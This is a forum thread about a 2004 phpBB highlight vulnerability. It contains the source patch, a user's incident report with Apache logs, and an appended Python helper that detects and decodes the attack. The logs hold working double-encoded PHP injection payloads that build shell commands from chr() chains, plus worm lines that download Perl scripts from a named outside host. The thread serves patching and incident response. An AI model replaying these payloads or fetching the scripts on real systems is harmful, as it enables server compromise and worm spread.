Author | Message
stefan
Administrator

Joined: 02.08.2002
Posts: 4735
Location: Aachen
Posted on: Thu 18 Nov, 2004 15:28
A new security issue was found in highlighting and you should urgently and quickly update your viewtopic.php with this fix:
open viewtopic.php and find:
Code:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
for($i = 0; $i < sizeof($words); $i++)
{
and replace with:
Code:
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));
for($i = 0; $i < sizeof($words); $i++)
{
Original posting can be found here:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
phpbb2.de was shortly taken last night with this one, so you should urgently and quickly update your system!!! I have already updated all downloadable phpBB2.x versions here at phpbb2.de with this fix.
_________________ Bye
Stefan
Styles Demo Forum :: Download Database :: phpBB2 Plus 1.5x Demo
phpBB2 Toplist :: International phpBB2 Support
Present - Back in Business
No Support via PM
Guest
Posted on: Fri 19 Nov, 2004 01:10
What needs to be considered for phpBB2 Plus 1.52? Which hacks conflict?
_________________ --[[URL=http://www.phpbb2.de/phpBB/search.php]Search function[/URL]]--
--[[URL=http://forum.phpbb2.de/viewtopic.php?t=2837][README] Support on phpBB2.de[/URL]]--
--[[URL=http://forum.phpbb2.de/viewtopic.php?t=3830]How to post properly on this board[/URL]]--
Nina3Jungs
Support Team Member

Joined: 18.06.2003
Posts: 4339
Posted on: Fri 19 Nov, 2004 01:11
I have put it in; no problems to be seen so far.
_________________ A person's prudence can be measured by the care
with which they consider the future
Support only in the forum, no support via PM or email
Guest
Posted on: Fri 19 Nov, 2004 01:17
OK - works for me too!
Only saw it by chance - will a newsletter follow?
_________________ --[[URL=http://www.phpbb2.de/phpBB/search.php]Search function[/URL]]--
--[[URL=http://forum.phpbb2.de/viewtopic.php?t=2837][README] Support on phpBB2.de[/URL]]--
--[[URL=http://forum.phpbb2.de/viewtopic.php?t=3830]How to post properly on this board[/URL]]--
kovzol
phpBB2.de User

Joined: 12.03.2005
Posts: 1
Posted on: Sat 12 March, 2005 19:41
Hi, I'm Zoltan Kovacs from Hungary. I run some web sites, some of which run phpBB2, which is great software (congrats!). I heard that some worm is attacking phpBB2 sites, but today I was also found by one. Here I provide some information about the facts to inform you urgently.
The worm came first from space.globehosting.net (209.59.164.114), then from 220.135.7.165 and later from several places. Here I provide the full list:
Code:
root@wmi:/srv/www> cd /var/log/apache2/
root@wmi:/var/log/apache2> cat access_log | grep highlight
209.59.164.114 - - [12/Mar/2005:11:13:20 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
220.135.7.165 - - [12/Mar/2005:11:57:15 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
81.169.166.77 - - [12/Mar/2005:12:33:58 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
82.154.158.203 - - [12/Mar/2005:13:03:20 +0100] "GET /~kovzol/phpBB2/profile.php?mode=register&highlight=%2527%252esystem(chr(105)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(97)%252echr(114)%252echr(112)%252echr(108)%252echr(104)%252echr(109)%252echr(100)%252echr(46)%252echr(122)%252echr(111)%252echr(114)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(32)%252echr(62)%252echr(32)%252echr(97)%252echr(114)%252echr(112)%252echr(108)%252echr(104)%252echr(109)%252echr(100)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(97)%252echr(114)%252echr(112)%252echr(108)%252echr(104)%252echr(109)%252echr(100)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527 HTTP/1.1" 200 15140 "-" "Mozilla/3.0 (compatible; Indy Library)"
66.66.44.241 - - [12/Mar/2005:13:59:23 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
81.201.129.212 - - [12/Mar/2005:15:00:07 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
207.46.98.129 - - [12/Mar/2005:15:04:53 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=12&highlight=&sid=6402f0d71e2ea70d12370a5597ac89f3 HTTP/1.0" 200 40521 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.129 - - [12/Mar/2005:15:05:18 +0100] "GET /~kovzol/phpBB2/viewtopic.php?p=89&highlight=&sid=6402f0d71e2ea70d12370a5597ac89f3 HTTP/1.0" 200 40521 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
194.192.14.152 - - [12/Mar/2005:15:25:02 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
82.179.199.9 - - [12/Mar/2005:16:32:31 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
217.22.231.77 - - [12/Mar/2005:18:12:50 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29255 "-" "Mozilla/4.0"
Here is the tail of my Apache error log:
Code:
--17:54:12-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try: 6) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--17:57:17-- http://homepages.pathfinder.gr/ermisrol/fixing/dead.pl
(try: 7) => `dead.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--17:57:27-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try: 7) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... invalid token near line 1 (text was 'di')
failed: Connection timed out.
Retrying.
--18:00:33-- http://homepages.pathfinder.gr/ermisrol/fixing/dead.pl
(try: 8) => `dead.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--18:00:43-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try: 8) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--18:03:50-- http://homepages.pathfinder.gr/ermisrol/fixing/dead.pl
(try: 9) => `dead.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--18:04:00-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try: 9) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... [Sat Mar 12 18:05:28 2005] [error] [client 68.142.251.157] File does not exist: /srv/www/htdocs/robots.txt
failed: Connection timed out.
Retrying.
--18:07:08-- http://homepages.pathfinder.gr/ermisrol/fixing/dead.pl
(try:10) => `dead.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--18:07:18-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try:10) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
[Sat Mar 12 18:10:23 2005] [notice] caught SIGTERM, shutting down
[Sat Mar 12 18:10:27 2005] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Sat Mar 12 18:10:27 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Sat Mar 12 18:10:28 2005] [notice] Apache/2.0.48 (Linux/SuSE) configured -- resuming normal operations
[Sat Mar 12 18:22:50 2005] [error] [client 64.140.49.66] File does not exist: /srv/www/htdocs/robots.txt
The worm here started a shell command line which downloaded the scan.pl and dead.pl files from http://homepages.pathfinder.gr/ermisrol/fixing/ and ran them - anyone can also download these files easily until the author of this worm removes them.
I don't want to deal much more with this issue. My quick fix was to stop the httpd server, fix the viewtopic.php file (as described on www.phpbb2.de, which I found using Google, "phpbb2 highlight") and restart the httpd server.
I found the worm because ps showed the shell command line exactly; dead.pl was a strange file name and I got suspicious.
I don't know if it is worth finding the author in Greece; if you want to search for him or her, it would be a great time to stop a mad person.
Yours sincerely, Zoltan
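An added triage helper, not code from this thread or from phpBB, covering both the fix in the first post and the access log above: it re-expresses the unpatched and patched highlight handling in Python to show why the second urldecode() mattered, and scans Apache access-log lines for the double-encoded highlight value, decoding any chr() chain so the attempted command can be read during incident review. The log lines, IP addresses and payload are constructed for the example.

```python
import re
from urllib.parse import urlparse, unquote

# Constructed sample lines in Apache combined format (not the poster's real log;
# the payload here decodes to the harmless probe "id").
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2005:11:13:20 +0100] "GET /phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(105)%252Echr(100))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
203.0.113.9 - - [12/Mar/2005:15:04:53 +0100] "GET /phpBB2/viewtopic.php?t=12&highlight=phpbb+fix HTTP/1.0" 200 40521 "-" "msnbot/1.0"
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
CHR_RE = re.compile(r'chr\((\d+)\)')


def php_htmlspecialchars(s):
    """PHP 4 default htmlspecialchars(): escapes & " < > but not the single quote."""
    return s.replace('&', '&amp;').replace('"', '&quot;').replace('<', '&lt;').replace('>', '&gt;')


def highlight_words(raw_value, patched):
    """Re-expression of the two PHP versions in the first post. The web server already
    decoded the query string once; the unpatched line ran urldecode() a second time."""
    value = php_htmlspecialchars(unquote(raw_value))   # what $HTTP_GET_VARS['highlight'] holds
    if not patched:
        value = unquote(value)                          # the removed urldecode()
    return value.strip().split(' ')


def raw_query_param(target, name):
    """Return the still-encoded value of one query parameter, or None if absent."""
    for pair in urlparse(target).query.split('&'):
        key, _, val = pair.partition('=')
        if key == name:
            return val
    return None


def triage_log(text):
    """Flag requests whose highlight value is double-encoded (%2527 -> %27 -> ')
    and decode any chr() chain so the attempted command is readable."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        raw = m and raw_query_param(m['target'], 'highlight')
        if not raw:
            continue
        once = unquote(raw)
        if once == unquote(once):          # no second encoding layer: ordinary search
            continue
        findings.append({'ip': m['ip'], 'ts': m['ts'], 'status': m['status'],
                         'decoded': ''.join(chr(int(n)) for n in CHR_RE.findall(once))})
    return findings
```

Run it over the real access_log to get one record per suspicious request; a 200 status on a flagged line means the unpatched code executed the request, so check running processes and new files as the poster did.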